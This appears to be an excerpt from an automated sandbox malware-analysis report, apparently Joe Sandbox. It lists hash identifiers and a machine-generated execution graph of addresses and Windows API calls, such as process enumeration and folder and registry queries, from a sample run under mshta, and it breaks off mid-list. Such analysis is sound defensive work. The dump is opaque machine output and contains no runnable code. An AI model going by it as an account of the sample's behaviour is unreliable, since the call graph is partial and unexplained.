                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                  • Instruction ID: 30ff4598f0e4eac8d6253df818a0c1ecf9497428264be48db0637c5963cbd779
                                                                                                                                                                                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                  Function 03860FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000010.00000003.470628741.0000000003860000.00000010.00000800.00020000.00000000.sdmp, Offset: 03860000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_16_3_3860000_mshta.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                  • Instruction ID: 30ff4598f0e4eac8d6253df818a0c1ecf9497428264be48db0637c5963cbd779
                                                                                                                                                                                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                  • Instruction Fuzzy Hash:

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:5.6%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                  Signature Coverage:2.9%
                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                  Total number of Limit Nodes:59
                                                                                                                                                                                  execution_graph 37666 4466f4 37685 446904 37666->37685 37668 446700 GetModuleHandleA 37671 446710 __set_app_type __p__fmode __p__commode 37668->37671 37670 4467a4 37672 4467ac __setusermatherr 37670->37672 37673 4467b8 37670->37673 37671->37670 37672->37673 37686 4468f0 _controlfp 37673->37686 37675 4467bd _initterm __wgetmainargs _initterm 37676 44681e GetStartupInfoW 37675->37676 37677 446810 37675->37677 37679 446866 GetModuleHandleA 37676->37679 37687 41276d 37679->37687 37683 446896 exit 37684 44689d _cexit 37683->37684 37684->37677 37685->37668 37686->37675 37688 41277d 37687->37688 37730 4044a4 LoadLibraryW 37688->37730 37690 412785 37722 412789 37690->37722 37738 414b81 37690->37738 37693 4127c8 37744 412465 memset ??2@YAPAXI 37693->37744 37695 4127ea 37756 40ac21 37695->37756 37700 412813 37774 40dd07 memset 37700->37774 37701 412827 37779 40db69 memset 37701->37779 37705 40ada2 _wcsicmp 37707 41283d 37705->37707 37706 412822 37801 4125b6 ??3@YAXPAX DeleteObject 37706->37801 37707->37706 37710 412863 CoInitialize 37707->37710 37784 41268e 37707->37784 37709 412966 37802 40b1ab free free 37709->37802 37800 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37710->37800 37714 41296f 37803 40b633 37714->37803 37716 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37721 412957 CoUninitialize 37716->37721 37727 4128ca 37716->37727 37721->37706 37722->37683 37722->37684 37723 4128d0 TranslateAcceleratorW 37724 412941 GetMessageW 37723->37724 37723->37727 37724->37721 37724->37723 37725 412909 IsDialogMessageW 37725->37724 37725->37727 37726 4128fd IsDialogMessageW 37726->37724 37726->37725 37727->37723 37727->37725 37727->37726 37728 41292b TranslateMessage DispatchMessageW 37727->37728 37729 41291f IsDialogMessageW 37727->37729 37728->37724 37729->37724 37729->37728 37731 4044f7 37730->37731 37732 4044cf GetProcAddress 37730->37732 37736 404507 MessageBoxW 37731->37736 37737 40451e 37731->37737 37733 4044e8 FreeLibrary 37732->37733 37734 4044df 37732->37734 37733->37731 37735 4044f3 37733->37735 37734->37733 37735->37731 37736->37690 37737->37690 37739 414b8a 37738->37739 37740 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37738->37740 37807 40a804 memset 37739->37807 37740->37693 37743 414b9e GetProcAddress 37743->37740 37745 4124e0 37744->37745 37746 412505 ??2@YAPAXI 37745->37746 37747 41251c 37746->37747 37749 412521 37746->37749 37829 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37747->37829 37818 444722 37749->37818 37755 41259b wcscpy 37755->37695 37834 40b1ab free free 37756->37834 37760 40a9ce malloc memcpy free free 37763 40ac5c 37760->37763 37761 40ad4b 37769 40ad76 37761->37769 37858 40a9ce 37761->37858 37763->37760 37763->37761 37764 40ace7 free 37763->37764 37763->37769 37838 40a8d0 37763->37838 37850 4099f4 37763->37850 37764->37763 37768 40a8d0 7 API calls 37768->37769 37835 40aa04 37769->37835 37770 40ada2 37771 40adc9 37770->37771 37772 40adaa 37770->37772 37771->37700 37771->37701 37772->37771 37773 40adb3 _wcsicmp 37772->37773 37773->37771 37773->37772 37863 40dce0 37774->37863 37776 40dd3a GetModuleHandleW 37868 40dba7 37776->37868 37780 40dce0 3 API calls 37779->37780 37781 40db99 37780->37781 37940 40dae1 37781->37940 37954 402f3a 37784->37954 37786 412766 37786->37706 37786->37710 37787 4126d3 _wcsicmp 37788 4126a8 37787->37788 37788->37786 37788->37787 37790 41270a 37788->37790 37988 4125f8 7 API calls 37788->37988 37790->37786 37957 411ac5 37790->37957 37800->37716 37801->37709 37802->37714 37804 40b640 37803->37804 37805 40b639 free 37803->37805 37806 40b1ab free free 37804->37806 37805->37804 37806->37722 37808 40a83b GetSystemDirectoryW 37807->37808 37809 40a84c wcscpy 37807->37809 37808->37809 37814 409719 wcslen 37809->37814 37812 40a881 LoadLibraryW 37813 40a886 37812->37813 37813->37740 37813->37743 37815 409724 37814->37815 37816 409739 wcscat LoadLibraryW 37814->37816 37815->37816 37817 40972c wcscat 37815->37817 37816->37812 37816->37813 37817->37816 37819 444732 37818->37819 37820 444728 DeleteObject 37818->37820 37830 409cc3 37819->37830 37820->37819 37822 412551 37823 4010f9 37822->37823 37824 401130 37823->37824 37825 401134 GetModuleHandleW LoadIconW 37824->37825 37826 401107 wcsncat 37824->37826 37827 40a7be 37825->37827 37826->37824 37828 40a7d2 37827->37828 37828->37755 37828->37828 37829->37749 37833 409bfd memset wcscpy 37830->37833 37832 409cdb CreateFontIndirectW 37832->37822 37833->37832 37834->37763 37836 40aa14 37835->37836 37837 40aa0a free 37835->37837 37836->37770 37837->37836 37839 40a8eb 37838->37839 37840 40a8df wcslen 37838->37840 37841 40a906 free 37839->37841 37842 40a90f 37839->37842 37840->37839 37843 40a919 37841->37843 37844 4099f4 3 API calls 37842->37844 37845 40a932 37843->37845 37846 40a929 free 37843->37846 37844->37843 37848 4099f4 3 API calls 37845->37848 37847 40a93e memcpy 37846->37847 37847->37763 37849 40a93d 37848->37849 37849->37847 37851 409a41 37850->37851 37852 4099fb malloc 37850->37852 37851->37763 37854 409a37 37852->37854 37855 409a1c 37852->37855 37854->37763 37856 409a30 free 37855->37856 37857 409a20 memcpy 37855->37857 37856->37854 37857->37856 37859 40a9e7 37858->37859 37860 40a9dc free 37858->37860 37861 4099f4 3 API calls 37859->37861 37862 40a9f2 37860->37862 37861->37862 37862->37768 37887 409bca GetModuleFileNameW 37863->37887 37865 40dce6 wcsrchr 37866 40dcf5 37865->37866 37867 40dcf9 wcscat 37865->37867 37866->37867 37867->37776 37888 44db70 37868->37888 37872 40dbfd 37891 4447d9 37872->37891 37875 40dc34 wcscpy wcscpy 37917 40d6f5 37875->37917 37876 40dc1f wcscpy 37876->37875 37879 40d6f5 3 API calls 37880 40dc73 37879->37880 37881 40d6f5 3 API calls 37880->37881 37882 40dc89 37881->37882 37883 40d6f5 3 API calls 37882->37883 37884 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37883->37884 37923 40da80 37884->37923 37887->37865 37889 40dbb4 memset memset 37888->37889 37890 409bca GetModuleFileNameW 37889->37890 37890->37872 37892 4447f4 37891->37892 37893 40dc1b 37892->37893 37894 444807 ??2@YAPAXI 37892->37894 37893->37875 37893->37876 37895 44481f 37894->37895 37896 444873 _snwprintf 37895->37896 37897 4448ab wcscpy 37895->37897 37930 44474a 8 API calls 37896->37930 37899 4448bb 37897->37899 37931 44474a 8 API calls 37899->37931 37900 4448a7 37900->37897 37900->37899 37902 4448cd 37932 44474a 8 API calls 37902->37932 37904 4448e2 37933 44474a 8 API calls 37904->37933 37906 4448f7 37934 44474a 8 API calls 37906->37934 37908 44490c 37935 44474a 8 API calls 37908->37935 37910 444921 37936 44474a 8 API calls 37910->37936 37912 444936 37937 44474a 8 API calls 37912->37937 37914 44494b 37938 44474a 8 API calls 37914->37938 37916 444960 ??3@YAXPAX 37916->37893 37918 44db70 37917->37918 37919 40d702 memset GetPrivateProfileStringW 37918->37919 37920 40d752 37919->37920 37921 40d75c WritePrivateProfileStringW 37919->37921 37920->37921 37922 40d758 37920->37922 37921->37922 37922->37879 37924 44db70 37923->37924 37925 40da8d memset 37924->37925 37926 40daac LoadStringW 37925->37926 37927 40dac6 37926->37927 37927->37926 37928 40dade 37927->37928 37939 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37927->37939 37928->37706 37930->37900 37931->37902 37932->37904 37933->37906 37934->37908 37935->37910 37936->37912 37937->37914 37938->37916 37939->37927 37950 409b98 GetFileAttributesW 37940->37950 37942 40daea 37943 40daef wcscpy wcscpy GetPrivateProfileIntW 37942->37943 37949 40db63 37942->37949 37951 40d65d GetPrivateProfileStringW 37943->37951 37945 40db3e 37952 40d65d GetPrivateProfileStringW 37945->37952 37947 40db4f 37953 40d65d GetPrivateProfileStringW 37947->37953 37949->37705 37950->37942 37951->37945 37952->37947 37953->37949 37989 40eaff 37954->37989 37958 411ae2 memset 37957->37958 37959 411b8f 37957->37959 38029 409bca GetModuleFileNameW 37958->38029 37971 411a8b 37959->37971 37961 411b0a wcsrchr 37962 411b22 wcscat 37961->37962 37963 411b1f 37961->37963 38030 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 37962->38030 37963->37962 37965 411b67 38031 402afb 37965->38031 37969 411b7f 38087 40ea13 SendMessageW memset SendMessageW 37969->38087 37972 402afb 27 API calls 37971->37972 37973 411ac0 37972->37973 37974 4110dc 37973->37974 37975 41113e 37974->37975 37980 4110f0 37974->37980 38112 40969c LoadCursorW SetCursor 37975->38112 37977 411143 38113 4032b4 37977->38113 38131 444a54 37977->38131 37978 4110f7 _wcsicmp 37978->37980 37979 411157 37981 40ada2 _wcsicmp 37979->37981 37980->37975 37980->37978 38134 410c46 10 API calls 37980->38134 37984 411167 37981->37984 37982 4111af 37984->37982 37985 4111a6 qsort 37984->37985 37985->37982 37988->37788 37990 40eb10 37989->37990 38002 40e8e0 37990->38002 37993 40eb6c memcpy memcpy 37994 40ebb7 37993->37994 37994->37993 37995 40ebf2 ??2@YAPAXI ??2@YAPAXI 37994->37995 37998 40d134 16 API calls 37994->37998 37996 40ec2e ??2@YAPAXI 37995->37996 37997 40ec65 37995->37997 37996->37997 38012 40ea7f 37997->38012 37998->37994 38001 402f49 38001->37788 38003 40e8f2 38002->38003 38004 40e8eb ??3@YAXPAX 38002->38004 38005 40e900 38003->38005 38006 40e8f9 ??3@YAXPAX 38003->38006 38004->38003 38007 40e911 38005->38007 38008 40e90a ??3@YAXPAX 38005->38008 38006->38005 38009 40e931 ??2@YAPAXI ??2@YAPAXI 38007->38009 38010 40e921 ??3@YAXPAX 38007->38010 38011 40e92a ??3@YAXPAX 38007->38011 38008->38007 38009->37993 38010->38011 38011->38009 38013 40aa04 free 38012->38013 38014 40ea88 38013->38014 38015 40aa04 free 38014->38015 38016 40ea90 38015->38016 38017 40aa04 free 38016->38017 38018 40ea98 38017->38018 38019 40aa04 free 38018->38019 38020 40eaa0 38019->38020 38021 40a9ce 4 API calls 38020->38021 38022 40eab3 38021->38022 38023 40a9ce 4 API calls 38022->38023 38024 40eabd 38023->38024 38025 40a9ce 4 API calls 38024->38025 38026 40eac7 38025->38026 38027 40a9ce 4 API calls 38026->38027 38028 40ead1 38027->38028 38028->38001 38029->37961 38030->37965 38088 40b2cc 38031->38088 38033 402b0a 38034 40b2cc 27 API calls 38033->38034 38035 402b23 38034->38035 38036 40b2cc 27 API calls 38035->38036 38037 402b3a 38036->38037 38038 40b2cc 27 API calls 38037->38038 38039 402b54 38038->38039 38040 40b2cc 27 API calls 38039->38040 38041 402b6b 38040->38041 38042 40b2cc 27 API calls 38041->38042 38043 402b82 38042->38043 38044 40b2cc 27 API calls 38043->38044 38045 402b99 38044->38045 38046 40b2cc 27 API calls 38045->38046 38047 402bb0 38046->38047 38048 40b2cc 27 API calls 38047->38048 38049 402bc7 38048->38049 38050 40b2cc 27 API calls 38049->38050 38051 402bde 38050->38051 38052 40b2cc 27 API calls 38051->38052 38053 402bf5 38052->38053 38054 40b2cc 27 API calls 38053->38054 38055 402c0c 38054->38055 38056 40b2cc 27 API calls 38055->38056 38057 402c23 38056->38057 38058 40b2cc 27 API calls 38057->38058 38059 402c3a 38058->38059 38060 40b2cc 27 API calls 38059->38060 38061 402c51 38060->38061 38062 40b2cc 27 API calls 38061->38062 38063 402c68 38062->38063 38064 40b2cc 27 API calls 38063->38064 38065 402c7f 38064->38065 38066 40b2cc 27 API calls 38065->38066 38067 402c99 38066->38067 38068 40b2cc 27 API calls 38067->38068 38069 402cb3 38068->38069 38070 40b2cc 27 API calls 38069->38070 38071 402cd5 38070->38071 38072 40b2cc 27 API calls 38071->38072 38073 402cf0 38072->38073 38074 40b2cc 27 API calls 38073->38074 38075 402d0b 38074->38075 38076 40b2cc 27 API calls 38075->38076 38077 402d26 38076->38077 38078 40b2cc 27 API calls 38077->38078 38079 402d3e 38078->38079 38080 40b2cc 27 API calls 38079->38080 38081 402d59 38080->38081 38082 40b2cc 27 API calls 38081->38082 38083 402d78 38082->38083 38084 40b2cc 27 API calls 38083->38084 38085 402d93 38084->38085 38086 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38085->38086 38086->37969 38087->37959 38091 40b58d 38088->38091 38090 40b2d1 38090->38033 38092 40b5a4 GetModuleHandleW FindResourceW 38091->38092 38093 40b62e 38091->38093 38094 40b5c2 LoadResource 38092->38094 38096 40b5e7 38092->38096 38093->38090 38095 40b5d0 SizeofResource LockResource 38094->38095 38094->38096 38095->38096 38096->38093 38104 40afcf 38096->38104 38098 40b608 memcpy 38107 40b4d3 memcpy 38098->38107 38100 40b61e 38108 40b3c1 18 API calls 38100->38108 38102 40b626 38109 40b04b 38102->38109 38105 40b04b ??3@YAXPAX 38104->38105 38106 40afd7 ??2@YAPAXI 38105->38106 38106->38098 38107->38100 38108->38102 38110 40b051 ??3@YAXPAX 38109->38110 38111 40b05f 38109->38111 38110->38111 38111->38093 38112->37977 38114 4032c4 38113->38114 38115 40b633 free 38114->38115 38116 403316 38115->38116 38135 44553b 38116->38135 38120 403480 38333 40368c 15 API calls 38120->38333 38122 403489 38123 40b633 free 38122->38123 38124 403495 38123->38124 38124->37979 38125 4033a9 memset memcpy 38126 4033ec wcscmp 38125->38126 38127 40333c 38125->38127 38126->38127 38127->38120 38127->38125 38127->38126 38331 4028e7 11 API calls 38127->38331 38332 40f508 6 API calls 38127->38332 38129 403421 _wcsicmp 38129->38127 38132 444a64 FreeLibrary 38131->38132 38133 444a83 38131->38133 38132->38133 38133->37979 38134->37980 38136 445548 38135->38136 38137 445599 38136->38137 38334 40c768 38136->38334 38138 4455a8 memset 38137->38138 38145 4457f2 38137->38145 38418 403988 38138->38418 38149 445854 38145->38149 38521 403e2d memset memset memset memset memset 38145->38521 38146 445672 38429 403fbe memset memset memset memset memset 38146->38429 38147 4458bb memset memset 38152 414c2e 17 API calls 38147->38152 38197 4458aa 38149->38197 38544 403c9c memset memset memset memset memset 38149->38544 38150 44595e memset memset 38156 414c2e 17 API calls 38150->38156 38151 4455e5 38151->38146 38159 44560f 38151->38159 38157 4458f9 38152->38157 38153 44557a 38194 44558c 38153->38194 38398 4136c0 38153->38398 38155 445a00 memset memset 38166 414c2e 17 API calls 38155->38166 38167 44599c 38156->38167 38168 40b2cc 27 API calls 38157->38168 38171 4087b3 338 API calls 38159->38171 38161 445849 38612 40b1ab free free 38161->38612 38162 445bca 38169 445c8b memset memset 38162->38169 38236 445cf0 38162->38236 38163 445b38 memset memset memset 38174 445bd4 38163->38174 38175 445b98 38163->38175 38176 445a3e 38166->38176 38178 40b2cc 27 API calls 38167->38178 38170 445909 38168->38170 38182 414c2e 17 API calls 38169->38182 38179 409d1f 6 API calls 38170->38179 38180 445621 38171->38180 38173 44589f 38613 40b1ab free free 38173->38613 38567 414c2e 38174->38567 38175->38174 38184 445ba2 38175->38184 38187 40b2cc 27 API calls 38176->38187 38181 4459ac 38178->38181 38190 445919 38179->38190 38598 4454bf 20 API calls 38180->38598 38192 409d1f 6 API calls 38181->38192 38193 445cc9 38182->38193 38705 4099c6 wcslen 38184->38705 38185 4456b2 38600 40b1ab free free 38185->38600 38198 445a4f 38187->38198 38189 403335 38330 4452e5 45 API calls 38189->38330 38614 409b98 GetFileAttributesW 38190->38614 38191 445823 38191->38161 38204 4087b3 338 API calls 38191->38204 38206 4459bc 38192->38206 38207 409d1f 6 API calls 38193->38207 38402 444b06 38194->38402 38195 445879 38195->38173 38217 4087b3 338 API calls 38195->38217 38197->38147 38222 44594a 38197->38222 38210 409d1f 6 API calls 38198->38210 38201 445d3d 38221 40b2cc 27 API calls 38201->38221 38202 445d88 memset memset memset 38205 414c2e 17 API calls 38202->38205 38204->38191 38214 445dde 38205->38214 38681 409b98 GetFileAttributesW 38206->38681 38216 445ce1 38207->38216 38208 445bb3 38708 445403 memset 38208->38708 38209 445680 38209->38185 38452 4087b3 memset 38209->38452 38219 445a63 38210->38219 38211 40b2cc 27 API calls 38220 445bf3 38211->38220 38212 445928 38212->38222 38615 40b6ef 38212->38615 38223 40b2cc 27 API calls 38214->38223 38725 409b98 GetFileAttributesW 38216->38725 38217->38195 38228 40b2cc 27 API calls 38219->38228 38583 409d1f wcslen wcslen 38220->38583 38231 445d54 _wcsicmp 38221->38231 38222->38150 38235 4459ed 38222->38235 38234 445def 38223->38234 38224 4459cb 38224->38235 38245 40b6ef 253 API calls 38224->38245 38238 445a94 38228->38238 38242 445d71 38231->38242 38308 445d67 38231->38308 38233 445665 38599 40b1ab free free 38233->38599 38243 409d1f 6 API calls 38234->38243 38235->38155 38278 445b22 38235->38278 38236->38189 38236->38201 38236->38202 38237 445389 259 API calls 38237->38162 38682 40ae18 38238->38682 38239 44566d 38239->38145 38503 413d4c 38239->38503 38726 445093 23 API calls 38242->38726 38251 445e03 38243->38251 38245->38235 38247 4456d8 38252 40b2cc 27 API calls 38247->38252 38250 44563c 38250->38233 38255 4087b3 338 API calls 38250->38255 38727 409b98 GetFileAttributesW 38251->38727 38258 4456e2 38252->38258 38253 40b2cc 27 API calls 38259 445c23 38253->38259 38254 445d83 38254->38189 38255->38250 38257 40b6ef 253 API calls 38257->38189 38601 413fa6 _wcsicmp _wcsicmp 38258->38601 38263 409d1f 6 API calls 38259->38263 38261 445e12 38268 445e6b 38261->38268 38274 40b2cc 27 API calls 38261->38274 38266 445c37 38263->38266 38264 445aa1 38267 445b17 38264->38267 38282 445ab2 memset 38264->38282 38296 409d1f 6 API calls 38264->38296 38304 445389 259 API calls 38264->38304 38689 40add4 38264->38689 38694 40ae51 38264->38694 38265 4456eb 38270 4456fd memset memset memset memset 38265->38270 38271 4457ea 38265->38271 38272 445389 259 API calls 38266->38272 38702 40aebe 38267->38702 38729 445093 23 API calls 38268->38729 38602 409c70 wcscpy wcsrchr 38270->38602 38605 413d29 38271->38605 38277 445c47 38272->38277 38279 445e33 38274->38279 38284 40b2cc 27 API calls 38277->38284 38278->38162 38278->38163 38285 409d1f 6 API calls 38279->38285 38281 445e7e 38286 445f67 38281->38286 38287 40b2cc 27 API calls 38282->38287 38289 445c53 38284->38289 38290 445e47 38285->38290 38291 40b2cc 27 API calls 38286->38291 38287->38264 38288 409c70 2 API calls 38292 44577e 38288->38292 38293 409d1f 6 API calls 38289->38293 38728 409b98 GetFileAttributesW 38290->38728 38295 445f73 38291->38295 38297 409c70 2 API calls 38292->38297 38298 445c67 38293->38298 38300 409d1f 6 API calls 38295->38300 38296->38264 38301 44578d 38297->38301 38302 445389 259 API calls 38298->38302 38299 445e56 38299->38268 38305 445e83 memset 38299->38305 38303 445f87 38300->38303 38301->38271 38307 40b2cc 27 API calls 38301->38307 38302->38162 38732 409b98 GetFileAttributesW 38303->38732 38304->38264 38309 40b2cc 27 API calls 38305->38309 38311 4457a8 38307->38311 38308->38189 38308->38257 38310 445eab 38309->38310 38312 409d1f 6 API calls 38310->38312 38313 409d1f 6 API calls 38311->38313 38314 445ebf 38312->38314 38315 4457b8 38313->38315 38316 40ae18 9 API calls 38314->38316 38604 409b98 GetFileAttributesW 38315->38604 38326 445ef5 38316->38326 38318 4457c7 38318->38271 38320 4087b3 338 API calls 38318->38320 38319 40ae51 9 API calls 38319->38326 38320->38271 38321 445f5c 38323 40aebe FindClose 38321->38323 38322 40add4 2 API calls 38322->38326 38323->38286 38324 40b2cc 27 API calls 38324->38326 38325 409d1f 6 API calls 38325->38326 38326->38319 38326->38321 38326->38322 38326->38324 38326->38325 38328 445f3a 38326->38328 38730 409b98 GetFileAttributesW 38326->38730 38731 445093 23 API calls 38328->38731 38330->38127 38331->38129 38332->38127 38333->38122 38335 40c775 38334->38335 38733 40b1ab free free 38335->38733 38337 40c788 38734 40b1ab free free 38337->38734 38339 40c790 38735 40b1ab free free 38339->38735 38341 40c798 38342 40aa04 free 38341->38342 38343 40c7a0 38342->38343 38736 40c274 memset 38343->38736 38348 40a8ab 9 API calls 38349 40c7c3 38348->38349 38350 40a8ab 9 API calls 38349->38350 38351 40c7d0 38350->38351 38765 40c3c3 38351->38765 38355 40c877 38364 40bdb0 38355->38364 38356 40c86c 38793 4053fe 39 API calls 38356->38793 38359 40c813 _wcslwr 38791 40c634 50 API calls 38359->38791 38361 40c829 wcslen 38362 40c7e5 38361->38362 38362->38355 38362->38356 38790 40a706 wcslen memcpy 38362->38790 38792 40c634 50 API calls 38362->38792 38954 404363 38364->38954 38366 40bf5d 38974 40440c 38366->38974 38370 40b2cc 27 API calls 38371 40be02 wcslen 38370->38371 38371->38366 38374 40be1e 38371->38374 38372 40be26 wcsncmp 38372->38374 38374->38366 38374->38372 38376 40be7d memset 38374->38376 38377 40bea7 memcpy 38374->38377 38378 40bf11 wcschr 38374->38378 38379 40b2cc 27 API calls 38374->38379 38381 40bf43 LocalFree 38374->38381 38977 40bd5d 28 API calls 38374->38977 38978 404423 38374->38978 38376->38374 38376->38377 38377->38374 38377->38378 38378->38374 38380 40bef6 _wcsnicmp 38379->38380 38380->38374 38380->38378 38381->38374 38382 4135f7 38993 4135e0 38382->38993 38385 40b2cc 27 API calls 38386 41360d 38385->38386 38387 40a804 8 API calls 38386->38387 38388 413613 38387->38388 38389 41363e 38388->38389 38390 40b273 27 API calls 38388->38390 38391 4135e0 FreeLibrary 38389->38391 38392 413625 GetProcAddress 38390->38392 38393 413643 38391->38393 38392->38389 38394 413648 38392->38394 38393->38153 38395 413658 38394->38395 38396 4135e0 FreeLibrary 38394->38396 38395->38153 38397 413666 38396->38397 38397->38153 38400 4136e2 38398->38400 38399 413827 38597 41366b FreeLibrary 38399->38597 38400->38399 38401 4137ac CoTaskMemFree 38400->38401 38401->38400 38996 4449b9 38402->38996 38405 444c1f 38405->38137 38406 4449b9 42 API calls 38408 444b4b 38406->38408 38407 444c15 38410 4449b9 42 API calls 38407->38410 38408->38407 39017 444972 GetVersionExW 38408->39017 38410->38405 38411 444b99 memcmp 38416 444b8c 38411->38416 38412 444c0b 39021 444a85 42 API calls 38412->39021 38416->38411 38416->38412 39018 444aa5 42 API calls 38416->39018 39019 40a7a0 GetVersionExW 38416->39019 39020 444a85 42 API calls 38416->39020 38419 40399d 38418->38419 39022 403a16 38419->39022 38421 403a09 39036 40b1ab free free 38421->39036 38423 4039a3 38423->38421 38427 4039f4 38423->38427 39033 40a02c CreateFileW 38423->39033 38424 403a12 wcsrchr 38424->38151 38427->38421 38428 4099c6 2 API calls 38427->38428 38428->38421 38430 414c2e 17 API calls 38429->38430 38431 404048 38430->38431 38432 414c2e 17 API calls 38431->38432 38433 404056 38432->38433 38434 409d1f 6 API calls 38433->38434 38435 404073 38434->38435 38436 409d1f 6 API calls 38435->38436 38437 40408e 38436->38437 38438 409d1f 6 API calls 38437->38438 38439 4040a6 38438->38439 38440 403af5 20 API calls 38439->38440 38441 4040ba 38440->38441 38442 403af5 20 API calls 38441->38442 38443 4040cb 38442->38443 39063 40414f memset 38443->39063 38445 404140 39077 40b1ab free free 38445->39077 38447 4040ec memset 38450 4040e0 38447->38450 38448 404148 38448->38209 38449 4099c6 2 API calls 38449->38450 38450->38445 38450->38447 38450->38449 38451 40a8ab 9 API calls 38450->38451 38451->38450 39090 40a6e6 WideCharToMultiByte 38452->39090 38454 4087ed 39091 4095d9 memset 38454->39091 38457 408953 38457->38209 38458 408809 memset memset memset memset memset 38459 40b2cc 27 API calls 38458->38459 38460 4088a1 38459->38460 38461 409d1f 6 API calls 38460->38461 38462 4088b1 38461->38462 38463 40b2cc 27 API calls 38462->38463 38464 4088c0 38463->38464 38465 409d1f 6 API calls 38464->38465 38466 4088d0 38465->38466 38467 40b2cc 27 API calls 38466->38467 38468 4088df 38467->38468 38469 409d1f 6 API calls 38468->38469 38470 4088ef 38469->38470 38471 40b2cc 27 API calls 38470->38471 38472 4088fe 38471->38472 38473 409d1f 6 API calls 38472->38473 38474 40890e 38473->38474 38475 40b2cc 27 API calls 38474->38475 38476 40891d 38475->38476 38477 409d1f 6 API calls 38476->38477 38478 40892d 38477->38478 38504 40b633 free 38503->38504 38505 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38504->38505 38506 413f00 Process32NextW 38505->38506 38507 413da5 OpenProcess 38506->38507 38508 413f17 CloseHandle 38506->38508 38509 413eb0 38507->38509 38510 413df3 memset 38507->38510 38508->38247 38509->38506 38512 413ebf free 38509->38512 38513 4099f4 3 API calls 38509->38513 39140 413f27 38510->39140 38512->38509 38513->38509 38514 413e37 GetModuleHandleW 38516 413e46 GetProcAddress 38514->38516 38518 413e1f 38514->38518 38516->38518 38517 413e6a QueryFullProcessImageNameW 38517->38518 38518->38514 38518->38517 39145 413959 38518->39145 39161 413ca4 38518->39161 38520 413ea2 CloseHandle 38520->38509 38522 414c2e 17 API calls 38521->38522 38523 403eb7 38522->38523 38524 414c2e 17 API calls 38523->38524 38525 403ec5 38524->38525 38526 409d1f 6 API calls 38525->38526 38527 403ee2 38526->38527 38528 409d1f 6 API calls 38527->38528 38529 403efd 38528->38529 38530 409d1f 6 API calls 38529->38530 38531 403f15 38530->38531 38532 403af5 20 API calls 38531->38532 38533 403f29 38532->38533 38534 403af5 20 API calls 38533->38534 38535 403f3a 38534->38535 38536 40414f 33 API calls 38535->38536 38537 403f4f 38536->38537 38538 403faf 38537->38538 38539 403f5b memset 38537->38539 38542 4099c6 2 API calls 38537->38542 38543 40a8ab 9 API calls 38537->38543 39175 40b1ab free free 38538->39175 38539->38537 38541 403fb7 38541->38191 38542->38537 38543->38537 38545 414c2e 17 API calls 38544->38545 38546 403d26 38545->38546 38547 414c2e 17 API calls 38546->38547 38548 403d34 38547->38548 38549 409d1f 6 API calls 38548->38549 38550 403d51 38549->38550 38551 409d1f 6 API calls 38550->38551 38552 403d6c 38551->38552 38553 409d1f 6 API calls 38552->38553 38554 403d84 38553->38554 38555 403af5 20 API calls 38554->38555 38556 403d98 38555->38556 38557 403af5 20 API calls 38556->38557 38558 403da9 38557->38558 38559 40414f 33 API calls 38558->38559 38564 403dbe 38559->38564 38560 403e1e 39176 40b1ab free free 38560->39176 38562 403dca memset 38562->38564 38563 403e26 38563->38195 38564->38560 38564->38562 38565 4099c6 2 API calls 38564->38565 38566 40a8ab 9 API calls 38564->38566 38565->38564 38566->38564 38568 414b81 9 API calls 38567->38568 38569 414c40 38568->38569 38570 414c73 memset 38569->38570 39177 409cea 38569->39177 38571 414c94 38570->38571 39180 414592 RegOpenKeyExW 38571->39180 38575 414c64 SHGetSpecialFolderPathW 38576 414d0b 38575->38576 38576->38211 38577 414cc1 38578 414cf4 wcscpy 38577->38578 39181 414bb0 wcscpy 38577->39181 38578->38576 38580 414cd2 39182 4145ac RegQueryValueExW 38580->39182 38582 414ce9 RegCloseKey 38582->38578 38584 409d62 38583->38584 38585 409d43 wcscpy 38583->38585 38588 445389 38584->38588 38586 409719 2 API calls 38585->38586 38587 409d51 wcscat 38586->38587 38587->38584 38589 40ae18 9 API calls 38588->38589 38595 4453c4 38589->38595 38590 40ae51 9 API calls 38590->38595 38591 4453f3 38593 40aebe FindClose 38591->38593 38592 40add4 2 API calls 38592->38595 38594 4453fe 38593->38594 38594->38253 38595->38590 38595->38591 38595->38592 38596 445403 254 API calls 38595->38596 38596->38595 38597->38194 38598->38250 38599->38239 38600->38239 38601->38265 38603 409c89 38602->38603 38603->38288 38604->38318 38606 413d39 38605->38606 38607 413d2f FreeLibrary 38605->38607 38608 40b633 free 38606->38608 38607->38606 38609 413d42 38608->38609 38610 40b633 free 38609->38610 38611 413d4a 38610->38611 38611->38145 38612->38149 38613->38197 38614->38212 38616 44db70 38615->38616 38617 40b6fc memset 38616->38617 38618 409c70 2 API calls 38617->38618 38619 40b732 wcsrchr 38618->38619 38620 40b743 38619->38620 38621 